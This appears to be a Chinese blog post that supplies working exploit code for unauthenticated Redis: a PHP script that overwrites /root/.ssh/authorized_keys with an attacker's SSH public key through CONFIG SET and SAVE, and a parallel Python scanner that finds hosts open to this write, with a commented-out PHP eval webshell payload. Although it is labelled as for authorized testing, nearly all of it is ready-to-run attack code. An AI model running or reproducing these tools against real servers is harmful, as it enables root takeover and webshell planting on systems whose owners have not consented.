
Redis未授权写shell脚本

最近因为需要，写了一个自动化的 Redis 未授权访问写 shell 脚本（仅用于授权的渗透测试）。原理是通过 CONFIG SET dir/dbfilename 把 RDB 快照指向目标路径（例如 /root/.ssh/authorized_keys，注意会覆盖该文件），再 SAVE 落盘。

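<?php
   // Writes an SSH public key into /root/.ssh/authorized_keys on a Redis
   // instance that exposes CONFIG SET without AUTH. Authorized testing only.
   //
   // Mechanism: point the RDB dump (dir + dbfilename) at the target file,
   // store the key as a value and SAVE. CAVEAT: this REPLACES the whole
   // authorized_keys file with an RDB blob; the "\n" padding keeps the key
   // on a line of its own so sshd still parses it. The original dir and
   // dbfilename are put back afterwards so later saves go to dump.rdb again.
   $redis = new Redis();
   fwrite(STDOUT, "Target Ip: \n");
   // fgets() keeps the trailing newline, which would break the host name
   $target = trim(fgets(STDIN));
   // 5 s connect timeout so a filtered port does not hang the script
   if (!$redis->connect($target, 6379, 5)) {
      fwrite(STDERR, "[-] could not connect to $target:6379\n");
      exit(1);
   }
   // When the instance is not unauthenticated, AUTH with its password first
   //$auth = $redis->auth('');
   //var_dump($auth);
   $dir = $redis->config("GET","dir")["dir"];
   $dbfilename = $redis->config("GET","dbfilename")["dbfilename"];
   echo $dir;
   // Abort early when CONFIG SET is refused (renamed command, NOAUTH,
   // or /root/.ssh does not exist / is not enterable by the redis user)
   if (!$redis->config("SET", "dir", "/root/.ssh")) {
      fwrite(STDERR, "[-] CONFIG SET dir refused; nothing written\n");
      exit(1);
   }
   if (!$redis->config("SET", "dbfilename", "authorized_keys")) {
      // dir is already changed: put it back before giving up
      $redis->config("SET", "dir", $dir);
      fwrite(STDERR, "[-] CONFIG SET dbfilename refused; nothing written\n");
      exit(1);
   }
   fwrite(STDOUT, "Enter KeyName: \n");
   $keyname = trim(fgets(STDIN));
   echo $keyname;
   fwrite(STDOUT, "Enter PublicKey: \n");
   $public_key = trim(fgets(STDIN));
   // Newline padding isolates the key from the binary RDB header/footer
   $redis->set($keyname, "\n\n\n".$public_key."\n\n\n");
   $saved = $redis->save();
   // Clean-up: drop the key and restore dir/dbfilename so the next SAVE
   // (or BGSAVE) does not rewrite authorized_keys again.
   $redis->del($keyname);
   $redis->config("SET", "dbfilename", $dbfilename);
   $redis->config("SET", "dir", $dir);
   if (!$saved) {
      fwrite(STDERR, "[-] SAVE failed (check dir permissions / MISCONF)\n");
      exit(1);
   }
   fwrite(STDOUT, "[+] key written to /root/.ssh/authorized_keys on $target\n");
?>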

自动化探测目标 IP 的 Redis（6379 端口）是否允许未授权执行 CONFIG SET，即是否可能写入 webshell 或 SSH 公钥。

from multiprocessing import Pool
import os, time, random
import redis

# Per-mode result buckets: the probe functions append the host they tested
# to the matching list and Test() prints them. NOTE: a probe executed in a
# multiprocessing.Pool child appends to that child's copy of the list, not
# to the parent process's copy.
ip_ssh_failed: list[str] = []
ip_ssh_success: list[str] = []
ip_web_success: list[str] = []
ip_web_failed: list[str] = []

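def RedisWebShellTry(ip):
   """Probe whether Redis on ``ip``:6379 accepts an unauthenticated CONFIG SET.

   A permitted CONFIG SET on ``dir`` is the precondition for a webshell
   write (the commented-out lines show the follow-up: point dbfilename at
   a .php file, SET a key holding the payload, SAVE). The probe itself is
   non-destructive: it writes the directory's current value back instead
   of changing it.

   Args:
      ip: target host (IP or hostname). Appended to ``ip_web_success`` or
         ``ip_web_failed`` depending on the outcome.

   Returns:
      True when CONFIG SET was accepted, False on any failure. The exception
      text is printed so NOAUTH, a renamed CONFIG command and connect
      timeouts can be told apart.
   """
   global ip_web_success
   global ip_web_failed
   try:
      # Short timeouts: a filtered port would otherwise block this worker
      # for the OS connect timeout. password="" sends no AUTH at all.
      r = redis.Redis(host=ip, port=6379, password="",
                      socket_connect_timeout=3, socket_timeout=3)
      pwd = r.config_get("dir")['dir']
      # The original probe set dir to "", which makes the server chdir("")
      # and fail, so it reported failure even on vulnerable hosts. Writing
      # the current value back proves CONFIG SET works without side effects.
      testresult = r.config_set("dir", pwd)
      # r.config_set("dbfilename","phpinfo.php")
      # r.set("xxxxx","<?php @eval($_POST[sqvds]); ?>")
   except Exception as e:
      ip_web_failed.append(ip)
      print("[*] " + ip + " Test Web Failed, I can not set the dir (" + str(e) + ")")
      return False
   if testresult:
      print("[*] " + ip + " Test Successful, Current Dir: ", pwd)
      ip_web_success.append(ip)
      return True
   ip_web_failed.append(ip)
   print("[*] " + ip + " Test Web Failed, I can not set the dir")
   return False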

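def RedisSSHTry(ip):
   """Probe whether Redis on ``ip``:6379 lets us point ``dir`` at /root/.ssh.

   CONFIG SET dir makes the server chdir(), so success means CONFIG is
   reachable without AUTH and /root/.ssh exists and is enterable by the
   redis process -- the precondition for the authorized_keys write. The
   original directory is restored afterwards so the probe leaves no trace
   and a later BGSAVE does not drop dump.rdb into /root/.ssh.

   Args:
      ip: target host (IP or hostname). Appended to ``ip_ssh_success`` or
         ``ip_ssh_failed`` depending on the outcome.

   Returns:
      True when CONFIG SET dir /root/.ssh was accepted, False otherwise.
      The exception text is printed so the failure cause is visible.
   """
   try:
      # Short timeouts so a filtered port does not block the worker.
      r = redis.Redis(host=ip, port=6379, password="",
                      socket_connect_timeout=3, socket_timeout=3)
      pwd = r.config_get("dir")['dir']
      setroot = r.config_set("dir", "/root/.ssh")
   except Exception as e:
      ip_ssh_failed.append(ip)
      print("[*] " + ip + " Test SSH Failed (" + str(e) + ")")
      return False
   if setroot:
      # Put the original directory back; the probe must not change state.
      try:
         r.config_set("dir", pwd)
      except Exception as e:
         print("[*] " + ip + " warning: could not restore dir " + pwd + " (" + str(e) + ")")
      ip_ssh_success.append(ip)
      print("[*] " + ip + " Test SSH Successful")
      return True
   ip_ssh_failed.append(ip)
   print("[*] " + ip + " Test SSH Failed")
   return False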

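def _probe(fn, ip):
   """Run ``fn(ip)`` inside a pool worker and return ``(ip, success)``.

   Pool workers are separate processes, so the appends the probe makes to
   the module-level result lists never reach the parent. The worker does
   append to its own copy, so membership in that copy is the verdict and
   is shipped back as a plain tuple for the parent to record.
   """
   fn(ip)
   success = ip in ip_web_success or ip in ip_ssh_success
   return ip, success


def Test(ip_list, type="web"):
   """Probe every host in ``ip_list`` in parallel and print the result buckets.

   Args:
      ip_list: iterable of hosts to probe (an empty list prints two empty
         buckets instead of failing on ``Pool(0)``).
      type: "web" runs RedisWebShellTry, "ssh" runs RedisSSHTry.

   Raises:
      ValueError: ``type`` is neither "web" nor "ssh".
   """
   if type == "web":
      fn, success, failed = RedisWebShellTry, ip_web_success, ip_web_failed
   elif type == "ssh":
      fn, success, failed = RedisSSHTry, ip_ssh_success, ip_ssh_failed
   else:
      raise ValueError("type must be 'web' or 'ssh', got %r" % (type,))
   ip_list = list(ip_list)
   verdicts = []
   if ip_list:
      # One worker per host, capped: Pool(0) raises, and hundreds of
      # processes buy nothing for a network-bound probe.
      p = Pool(min(len(ip_list), 32))
      pending = [p.apply_async(_probe, args=(fn, ip)) for ip in ip_list]
      # get() propagates a worker crash instead of silently dropping the host
      verdicts = [res.get() for res in pending]
      p.close()
      p.join()
   # Record the verdicts in the parent's lists, which the workers cannot reach
   for ip, ok in verdicts:
      (success if ok else failed).append(ip)
   print(type + "_success: ", success)
   print(type + "_failed: ", failed)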

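if __name__ == '__main__':
   # Usage: script.py [web|ssh] [ip ...]. With no arguments the original
   # behaviour is kept: SSH probe of the two lab hosts below.
   import sys
   args = sys.argv[1:]
   mode = "ssh"
   if args and args[0] in ("web", "ssh"):
      mode = args.pop(0)
   ip = args or ['192.168.9.12', '192.168.9.13']
   Test(ip, mode)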